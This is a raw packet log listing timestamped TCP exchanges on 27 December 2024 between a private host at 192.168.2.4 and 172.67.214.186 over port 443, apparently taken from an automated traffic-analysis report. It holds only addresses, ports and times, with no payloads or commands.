                                                                                                                                      Dec 27, 2024 10:21:57.843087912 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.848833084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.848848104 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.848923922 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.848942041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.848992109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.854927063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.854942083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.855010986 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.855025053 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.855088949 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.860078096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.860094070 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.860169888 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.860183001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.860235929 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.038028955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.038047075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.038135052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.038157940 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.038213015 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.043908119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.043922901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.043979883 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.043994904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.044039011 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.049230099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.049251080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.049324989 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.049340010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.049402952 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.055191040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.055207968 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.055289984 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.055305004 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.055354118 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.060770035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.060786009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.060848951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.060863972 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.060889006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.060909986 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.066855907 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.066870928 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.066941023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.066972971 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.067019939 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.072757006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.072771072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.072844028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.072859049 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.072911024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.078012943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.078027010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.078083038 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.078097105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.078145027 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.239197969 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.239218950 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.239299059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.239347935 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.239377022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.239398003 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.245173931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.245189905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.245290041 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.245304108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.245358944 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.251069069 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.251089096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.251163960 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.251178026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.251228094 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.256299973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.256314993 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.256408930 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.256422997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.256477118 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.262641907 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.262658119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.262744904 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.262758970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.262811899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.267911911 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.267930984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.267997980 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.268012047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.268069029 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.273896933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.273914099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.273986101 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.274000883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.274050951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.279818058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.279836893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.279903889 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.279916048 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.279967070 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.441028118 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.441046000 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.441123962 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.441185951 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.441243887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.446929932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.446947098 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.447000980 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.447024107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.447050095 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.447068930 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.452905893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.452920914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.452996969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.453012943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.453059912 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.458287001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.458301067 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.458483934 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.458498955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.458559036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.463742018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.463756084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.463835001 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.463849068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.463876009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.463896990 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.469753027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.469768047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.469851971 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.469866991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.469922066 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.475686073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.475702047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.475776911 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.475792885 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.475842953 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.481661081 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.481676102 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.481736898 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.481751919 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.481797934 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.642641068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.642662048 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.642751932 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.642785072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.642843008 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.648474932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.648489952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.648566961 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.648581028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.648627996 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.654494047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.654510021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.654577017 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.654592037 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.654640913 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.659807920 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.659821987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.659895897 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.659913063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.659961939 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.666112900 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.666129112 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.666212082 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.666246891 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.666305065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.671350002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.671364069 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.671435118 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.671452045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.671502113 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.677237034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.677253008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.677320957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.677336931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.677387953 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.683247089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.683262110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.683345079 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.683361053 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.683410883 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.844012976 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.844031096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.844263077 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.844306946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.844362020 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.850059986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.850075960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.850156069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.850171089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.850217104 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.855915070 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.855927944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.855998039 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.856014013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.856055021 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.861186981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.861202002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.861262083 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.861275911 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.861325026 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.867503881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.867522001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.867584944 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.867599964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.867649078 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.872745991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.872764111 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.872833014 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.872848034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.872900009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.872935057 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.878840923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.878859997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.878917933 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.878937006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.878963947 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.878984928 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.884690046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.884704113 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.884752989 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.884767056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:58.884793997 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.884810925 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:58.895158052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.045372963 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.045388937 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.045460939 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.045489073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.045540094 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.051352978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.051367998 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.051453114 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.051469088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.051522970 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.057262897 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.057285070 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.057347059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.057362080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.057394028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.057415009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.062477112 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.062491894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.062567949 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.062597990 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.062643051 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.068968058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.068983078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.069047928 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.069063902 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.069113970 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.074037075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.074050903 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.074114084 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.074130058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.074181080 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.080200911 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.080214977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.080293894 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.080312014 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.080360889 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.085994959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.086010933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.086086988 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.086102962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.086153030 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.246907949 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.246923923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.247013092 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.247081041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.247140884 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.253031015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.253046989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.253128052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.253145933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.253191948 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.258809090 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.258824110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.258897066 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.258912086 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.258970022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.264940023 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.264954090 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.265022039 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.265037060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.265084982 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.270390034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.270406961 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.270478964 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.270493031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.270544052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.275671959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.275687933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.275758028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.275772095 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.275820971 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.281682014 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.281696081 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.281769991 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.281784058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.281833887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.287600040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.287617922 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.287688971 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.287704945 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.287751913 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.449136019 CET44349745172.67.214.186192.168.2.4
